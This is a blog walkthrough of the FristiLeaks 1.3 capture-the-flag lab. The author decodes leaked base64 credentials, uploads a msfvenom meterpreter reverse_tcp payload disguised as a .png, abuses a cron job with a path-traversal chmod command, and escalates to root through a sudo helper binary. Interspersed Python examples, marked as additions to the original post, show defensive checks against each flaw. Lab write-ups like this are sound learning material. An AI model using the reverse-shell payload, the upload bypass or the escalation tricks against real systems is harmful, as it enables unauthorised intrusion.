Saturday, 15 October 2016

CTF FristiLeaks: 1.3 - Walkthrough

I generally don't solve CTFs, but after watching a walkthrough by one of my close friends I thought even I must give it a try :P (yeah, these days I've had less work compared to the past few weeks and I've watched too many movies ;_;).

So I thought I'd try FristiLeaks 1.3. Yeah, in the beginning it was a bit puzzling, but then I started getting ideas about the further challenges one after another.

So, first things first, let's scan for live hosts in our network and grab the open ports of the target host.

$ nmap -sn

$ nmap -T4 -A -v

OK! So I got port 80 open here, with 3 disallowed entries in robots.txt: /cola, /sisi, /beer. Nice, let's check 'em.

Our main page. Let's check /cola, /sisi and /beer :D

Damn!! I got nothing except this meme :/ So here I tried some random links and finally found something on /fristi :D and yeah, it was a login page!!

Here I began checking the page source and found some encoded info; my guess was that it was base64.

Here I scrolled up a bit and found an image being decoded from inline base64, so I decided to replace the image's base64 data with the other base64 string I had found elsewhere in the source.

Bingo!! After decoding the base64 I got some weird text, "keKKeKKeKkEkkEk". LOL, easy guess: "PASSWORD" :V. I then started searching for a username, and the one thing that diverted my attention the most was a note inside the page source.
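As an added example (not from the original post, and not the VM's own page), here is a small Python audit script for exactly this kind of leftover: it pulls HTML comments and base64-looking runs out of a page source, decodes them, and tells PNG/JPEG/GIF data apart from plain text. The sample page source is constructed for the example; its commented-out base64 decodes to the same string the post found.

```python
import base64
import binascii
import re

# Constructed sample page source (not the VM's real page): an inline base64
# image plus a base64 string left behind in a comment, as the post describes.
SAMPLE_HTML = """<html><body>
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==">
<!-- TODO: We need to clean this up for production. -->
<!-- a2VLS2VLS2VLa0Vra0Vr -->
</body></html>"""

# Runs of the base64 alphabet at least 16 chars long, with optional padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
COMMENT = re.compile(r"<!--(.*?)-->", re.S)

# First bytes of the image formats we expect to see inlined.
MAGIC = {b"\x89PNG": "png", b"\xff\xd8\xff": "jpeg", b"GIF8": "gif"}


def classify(data: bytes) -> str:
    """Guess what a decoded blob is from its first bytes."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    if data and all(32 <= b < 127 or b in (9, 10, 13) for b in data):
        return "text"
    return "binary"


def find_comments(html: str) -> list:
    """Developer comments are where 'junk left in for testing' ends up."""
    return [c.strip() for c in COMMENT.findall(html)]


def audit_page_source(html: str) -> list:
    """Decode every base64-looking run and report what it turned out to be."""
    findings = []
    for m in B64_RUN.finditer(html):
        token = m.group(0)
        try:
            data = base64.b64decode(token, validate=True)
        except binascii.Error:
            continue  # looked like base64 but was not
        kind = classify(data)
        preview = data.decode("ascii") if kind == "text" else data[:8].hex()
        findings.append({"kind": kind, "length": len(data), "preview": preview})
    return findings
```

Decoded text that looks like a credential, together with a comment saying the page still needs cleaning up, is what should fail a pre-production review of the site.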

 We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz

Now nothing here looks suspicious except the name of the one who left this comment: "eezeepz".

I decided to try the combination

username : eezeepz
password : keKKeKKeKkEkkEk

and got successful access :D wew!!

Next, the only option I found was to upload files, but only in image format (I tried uploading directly with a .php extension and that didn't work).

So I generated a PHP payload via msfvenom and renamed it to .php.png

$ sudo msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4444 -f raw
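An added example of the check the upload form got wrong, written in Python (not the VM's code, which I have not seen): the weak validator only asks whether the name ends in an image extension, so "shell.php.png" passes, while the strict one allows exactly one extension, requires the file's magic bytes to agree with it, and stores the file under a server-chosen name. I assume the double extension worked here because the web server's PHP handler matches ".php" anywhere in the file name; the server-side half of the fix is a handler that matches only a trailing ".php".

```python
import os
import secrets

ALLOWED_IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif"}

# First bytes of the image formats the form claims to accept.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}


def weak_is_image_upload(filename: str) -> bool:
    """The kind of check that lets 'shell.php.png' through (assumed, not the
    VM's code): it only asks whether the name ends with an image extension."""
    return any(filename.lower().endswith(ext) for ext in ALLOWED_IMAGE_EXTS)


def strict_is_image_upload(filename: str, content: bytes) -> bool:
    """Hardened form: exactly one extension, it must be an image extension,
    and the file's magic bytes must agree with it."""
    root, ext = os.path.splitext(os.path.basename(filename))
    if not root or "." in root:  # rejects 'shell.php.png' and dotfiles
        return False
    ext = ext.lower()
    if ext not in ALLOWED_IMAGE_EXTS:
        return False
    for magic, magic_ext in MAGIC.items():
        if content.startswith(magic):
            return magic_ext == ext or (ext == ".jpeg" and magic_ext == ".jpg")
    return False  # no known image header at all


def stored_name(filename: str, content: bytes) -> str:
    """Name to save the file under: random, server-chosen, keeping only the
    validated extension so the uploader's name never reaches the disk."""
    if not strict_is_image_upload(filename, content):
        raise ValueError("not an accepted image upload")
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(8) + ext
```

A PNG header followed by PHP code still passes the magic check, which is why the handler configuration, and not the validator alone, has to guarantee that nothing in the upload directory is ever executed.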

lol meterpreter I love u :P

Let's try to gain access to a bash shell :D

Let's check the users in the home dir.

OK, so there are 3 users, of which I have permission to access the "eezeepz" user's directory.

I did "ls -la" to list all the files with their respective permissions. There were so many files that looked like copies of commands from /usr/bin, but one file attracted my attention: a text file named "notes.txt", so I did "cat notes.txt" to open it, and found hints for the next challenge.

OK, so as it simply says, I have the privilege to use commands like chmod, df, cat, echo, ps, grep and egrep,
and if I execute any of them by writing them into a file "runthis" in the /tmp dir, I'll have the results delivered to a file named "cronresult". LOL, no guessing needed: it was clear that the admin user is the way to the other users and eventually to root. "chmod 777 admin -R"

I decided to change the permissions of user admin's dir, as I had the privilege to use the "chmod" command. I executed the following set of commands and got the positive result I expected :P.

$ echo "/usr/bin/../../bin/chmod -R 777 /home/admin" > /tmp/runthis
$ ls -lah /home
$ ls -alh /home/admin
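An added Python example (not the VM's cron script, which I have not seen) of the two checks that make this step work or fail. The "/usr/bin/../../bin/chmod" trick suggests the job accepts any line that starts with /usr/bin/, so the weak check here assumes exactly that; the strict version normalises the path lexically, requires it to sit directly under /usr/bin with one of the listed command names, and refuses chmod targets outside /tmp (an assumed policy for the example), because even a genuine chmod run as admin with caller-chosen arguments hands over that user's home directory.

```python
import os
import shlex

ALLOWED_PREFIX = "/usr/bin/"
# The commands notes.txt says may be run through /tmp/runthis.
ALLOWED_COMMANDS = {"chmod", "df", "cat", "echo", "ps", "grep", "egrep"}


def weak_is_allowed(line: str) -> bool:
    """Prefix check as I assume the VM's cron job does it: the command just
    has to start with /usr/bin/. '/usr/bin/../../bin/chmod' passes."""
    return line.startswith(ALLOWED_PREFIX)


def strict_is_allowed(line: str) -> bool:
    """Hardened check. os.path.normpath is purely lexical, so '..' is folded
    away without touching the filesystem and the result is deterministic."""
    try:
        argv = shlex.split(line)
    except ValueError:
        return False  # unbalanced quotes
    if not argv:
        return False
    path = os.path.normpath(argv[0])
    if os.path.dirname(path) != "/usr/bin":
        return False  # '/usr/bin/../../bin/chmod' normalises to /bin/chmod
    name = os.path.basename(path)
    if name not in ALLOWED_COMMANDS:
        return False
    if name == "chmod":
        # First non-option argument is the mode; everything after it is a
        # target path, which we confine to /tmp (assumed policy).
        positional = [a for a in argv[1:] if not a.startswith("-")]
        for target in positional[1:]:
            if not os.path.normpath(target).startswith("/tmp/"):
                return False
    return True
```

The deeper fix is not to have a privileged cron job read commands from a world-writable file in /tmp at all; any local user can write there, so the allowlist is the only thing standing between them and the admin account.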

I found some suspicious text files which could be hints to another challenge.

-- whoisyourgodnow.txt
-- cryptedpass.txt

Two files contained some encrypted text, one in base64 and the other some random text (as far as I could guess), and a third file was a Python script to decode those passwords. I decided to decode one of them, starting with the base64 one.

So it was a password (I guessed so, because the password for the admin panel had also been disclosed in the same manner).

I decided to try it for fristigod, and logged in successfully :)

After owning the fristigod user I came one step closer to root :D

So I was in the dir /var/fristigod, as unfortunately I didn't find any hint in /home/fristigod/. There I noticed some hidden files; one of them was .bash_history. I decided to open it and found a set of commands recorded in that file, which whoever had been there before me had used, so I thought I'd give them a try ( 3:) evil mind)

$ cat .bash_history 

ls -lah
cd .secret_admin_stuff/
./doCom test
sudo ls
cd .secret_admin_stuff/
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
ls -lah
usermod -G fristigod fristi
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e


hmm ... 

Okay!! Now I was a bit tired and decided to run "sudo -l" to get the $PATH

"/var/fristigod/.secret_admin_stuff/doCom": it was a clear hint that this file has some privilege to change permissions or do some tasks with root's permissions, because it's owned by root.

I decided to execute this file "doCom"

$ ./.secret_admin_stuff/doCom

and got this result:

"Nice try , But wrong user ;)"

There I decided to use "sudo" with the "-u" argument

$ sudo -u fristi ./.secret_admin_stuff/doCom

Again I got a hint about the usage of this file

"Usage: ./program_name terminal_command ..."

lol, here I got the idea that this file will elevate the privileges of a command of our choice :P I decided to go with /bin/bash; after all, who doesn't want /bin/bash with full privileges? ( 3:D evil mind)

$ sudo -u fristi ./.secret_admin_stuff/doCom /bin/bash


Thanks Aaditya Purani :D for being an inspiration, bro :D This post is dedicated to you, bro ^_^

=> Walkthrough to Billy Madison 1.1 By Aaditya Purani


Okay!! So here I end this post :) Hope you like it :)